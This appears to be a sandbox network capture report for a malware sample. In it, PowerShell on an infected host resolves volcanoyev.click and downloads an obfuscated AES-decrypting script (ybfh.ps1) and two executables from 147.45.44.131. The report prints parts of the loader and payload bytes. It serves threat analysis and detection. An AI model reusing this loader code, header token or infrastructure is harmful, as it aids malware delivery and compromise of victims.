Dec 24, 2024 02:18:35.356590033 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.356723070 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.356750965 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.356805086 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.356810093 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.391328096 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.391474962 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.391519070 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.391532898 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.439326048 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.439517975 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.439569950 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.439588070 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.483347893 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.483544111 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.527332067 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.710084915 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:36.181128979 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:36.181252956 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:36.181338072 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:36.185817003 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:36.185848951 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:36.241955042 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:36.242028952 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:36.242104053 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:36.242408037 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:36.242419958 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.455053091 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.455265045 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.456566095 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.456572056 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.456803083 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.457973957 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.458100080 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.458125114 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.458197117 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.458204031 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.726517916 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.726624966 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.726674080 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.726777077 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.726795912 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.731061935 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.731105089 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:37.731167078 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.731448889 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:37.731461048 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.425847054 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.425939083 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.426095963 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.426156044 CET | 49726 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.426177025 CET | 443 | 49726 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.513967991 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.514015913 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.514070988 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.514714956 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.514724970 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.944307089 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.944427967 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.952558041 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.952574015 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.952838898 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:38.954299927 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.954350948 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:38.954368114 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.723536968 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.723634005 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.723687887 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.723872900 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.723892927 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.723901987 CET | 49727 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.723908901 CET | 443 | 49727 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.726026058 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.726092100 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.727427006 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.727432013 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.727736950 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:39.728908062 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.728975058 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:39.728980064 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:40.493607998 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:40.493849993 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:40.493926048 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:40.494085073 CET | 49728 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:40.494101048 CET | 443 | 49728 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:40.815421104 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:40.815464973 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:40.815560102 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:40.815869093 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:40.815886021 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.029433966 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.029577017 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.031109095 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.031116009 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.031491041 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.032998085 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.033826113 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.033869982 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.033984900 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034022093 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034113884 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034212112 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034322023 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034349918 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034475088 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034504890 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034616947 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034651995 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034663916 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034677982 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034770966 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034795046 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.034816980 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034921885 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.034948111 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.075373888 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.075566053 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.075598955 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.075628042 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.123332977 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:42.123523951 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:42.167329073 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.298599958 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.298686981 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.298856020 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:44.298939943 CET | 49729 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:44.298947096 CET | 443 | 49729 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.303469896 CET | 49730 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:44.303503036 CET | 443 | 49730 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.303595066 CET | 49730 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:44.303867102 CET | 49730 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:44.303886890 CET | 443 | 49730 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:44.807871103 CET | 49730 | 443 | 192.168.2.8 | 172.67.195.241
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 02:18:18.895083904 CET | 62221 | 53 | 192.168.2.8 | 1.1.1.1
Dec 24, 2024 02:18:19.208827972 CET | 53 | 62221 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 02:18:18.895083904 CET | 192.168.2.8 | 1.1.1.1 | 0xfaf3 | Standard query (0) | volcanoyev.click | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 02:18:19.208827972 CET | 1.1.1.1 | 192.168.2.8 | 0xfaf3 | No error (0) | volcanoyev.click | | 172.67.195.241 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 02:18:19.208827972 CET | 1.1.1.1 | 192.168.2.8 | 0xfaf3 | No error (0) | volcanoyev.click | | 104.21.52.56 | A (IP address) | IN (0x0001) | false
• volcanoyev.click
• 147.45.44.131
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 147.45.44.131 | 80 | 8068 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 24, 2024 02:18:13.778759003 CET275OUTGET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:15.053478956 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:14 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                           Data Ascii:
                                                           $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='
                                                           $WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='
                                                           $CyrxmaUOA2 = '...'
                                                           function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) {
                                                               $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv)
                                                               $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB)
                                                               $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                           Dec 24, 2024 02:18:15.053525925 CET | 867 | IN | Data Ascii:
                                                           $p7hxeaS5g2)
                                                               $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create()
                                                               $aQhXBizRAx.Key = $cTaSLj6r0V
                                                               $aQhXBizRAx.IV = $F1V1q6ulZs
                                                               $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
                                                               $gBOWS1t7hT = $
                                                           Dec 24, 2024 02:18:15.424038887 CET | 156 | OUT | GET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                           Dec 24, 2024 02:18:15.825175047 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                           Dec 24, 2024 02:18:15.825561047 CET | 1236 | IN | Data Ascii: llections.Specialized GetMethod CompileAssemblyFromSource get_BigEndianUnicode Invoke GetType MethodBase GuidAttribute DebuggableAttribute ComVisibleAttribute AssemblyTitleAttribute AssemblyTrademarkAttribute TargetFrameworkAttribute AssemblyF
                                                           Dec 24, 2024 02:18:16.146622896 CET | 156 | OUT | GET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                           Dec 24, 2024 02:18:16.547559977 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           1 | 192.168.2.8 | 49707 | 147.45.44.131 | 80 | 7228 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Dec 24, 2024 02:18:14.135981083 CET | 275 | OUT | GET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                           Dec 24, 2024 02:18:15.389766932 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                           Data Ascii:
                                                           $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='
                                                           $WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='
                                                           $CyrxmaUOA2 = '...'
                                                           function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) {
                                                               $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv)
                                                               $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB)
                                                               $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                           Dec 24, 2024 02:18:15.389960051 CET | 867 | IN | Data Ascii:
                                                           $p7hxeaS5g2)
                                                               $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create()
                                                               $aQhXBizRAx.Key = $cTaSLj6r0V
                                                               $aQhXBizRAx.IV = $F1V1q6ulZs
                                                               $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
                                                               $gBOWS1t7hT = $
                                                           Dec 24, 2024 02:18:15.481246948 CET | 156 | OUT | GET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                           Dec 24, 2024 02:18:15.882447958 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                           Dec 24, 2024 02:18:15.882607937 CET | 1236 | IN | Data Ascii: llections.Specialized GetMethod CompileAssemblyFromSource get_BigEndianUnicode Invoke GetType MethodBase GuidAttribute DebuggableAttribute ComVisibleAttribute AssemblyTitleAttribute AssemblyTrademarkAttribute TargetFrameworkAttribute AssemblyF
                                                           Dec 24, 2024 02:18:16.220746994 CET | 156 | OUT | GET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                           Dec 24, 2024 02:18:16.621664047 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program


                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                           2 | 192.168.2.8 | 49708 | 147.45.44.131 | 80 | 5656 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                           Timestamp | Bytes transferred | Direction | Data
                                                           Dec 24, 2024 02:18:15.789781094 CET | 275 | OUT | GET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                           Dec 24, 2024 02:18:17.040525913 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                           Data Ascii:
                                                           $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='
                                                           $WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='
                                                           $CyrxmaUOA2 = '...'
                                                           function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) {
                                                               $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv)
                                                               $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB)
                                                               $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                           Dec 24, 2024 02:18:17.040724993 CET | 867 | IN | Data Ascii:
                                                           $p7hxeaS5g2)
                                                               $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create()
                                                               $aQhXBizRAx.Key = $cTaSLj6r0V
                                                               $aQhXBizRAx.IV = $F1V1q6ulZs
                                                               $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
                                                               $gBOWS1t7hT = $
                                                           Dec 24, 2024 02:18:17.110922098 CET | 156 | OUT | GET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                           Dec 24, 2024 02:18:17.508258104 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:17 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                           Dec 24, 2024 02:18:17.508522987 CET | 1236 | IN | Data Ascii: llections.Specialized GetMethod CompileAssemblyFromSource get_BigEndianUnicode Invoke GetType MethodBase GuidAttribute DebuggableAttribute ComVisibleAttribute AssemblyTitleAttribute AssemblyTrademarkAttribute TargetFrameworkAttribute AssemblyF
                                                          Dec 24, 2024 02:18:17.509275913 CET1236INData Raw: 00 74 00 62 00 32 00 4a 00 4b 00 4d 00 6c 00 6c 00 53 00 65 00 57 00 38 00 79 00 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51
                                                          Data Ascii: tb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVE
                                                          Dec 24, 2024 02:18:17.509294033 CET1236INData Raw: 4a 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4f 00 47 00 46 00 43 00 57 00 55 00 5a 00 56 00 51 00 6a 00 52 00 42 00 52 00 7a 00 42 00 4a 00 55 00 56 00 68 00 55 00 4f 00 46 00 64 00
                                                          Data Ascii: JZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllR
                                                          Dec 24, 2024 02:18:17.510149956 CET1236INData Raw: 65 00 6e 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 61 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00
                                                          Data Ascii: enRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVk
                                                          Dec 24, 2024 02:18:17.510163069 CET744INData Raw: 46 00 42 00 4f 00 56 00 68 00 46 00 62 00 55 00 46 00 4d 00 51 00 6a 00 42 00 46 00 4e 00 6c 00 6c 00 45 00 52 00 6c 00 52 00 42 00 56 00 55 00 6c 00 4d 00 52 00 46 00 5a 00 6f 00 57 00 45 00 74 00 74 00 4f 00 44 00 68 00 52 00 61 00 46 00 70 00
                                                          Data Ascii: FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2
                                                          Dec 24, 2024 02:18:17.511027098 CET1236INData Raw: 46 00 57 00 62 00 55 00 6c 00 4c 00 52 00 55 00 5a 00 4e 00 56 00 56 00 6c 00 70 00 52 00 6c 00 70 00 45 00 52 00 55 00 6c 00 49 00 52 00 32 00 74 00 4a 00 65 00 46 00 6c 00 33 00 4e 00 56 00 52 00 43 00 56 00 6d 00 4e 00 58 00 51 00 6e 00 67 00
                                                          Data Ascii: FWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJ
                                                          Dec 24, 2024 02:18:17.511039972 CET1236INData Raw: 54 00 6c 00 46 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 5a 00 46 00 52 00 33 00 65 00 45 00 4e 00 4e 00 61 00 30 00 6c 00 52 00 55 00 57 00 77 00 30 00 56 00 57 00 46 00 42 00 57 00 6d 00 46 00 43 00 65 00
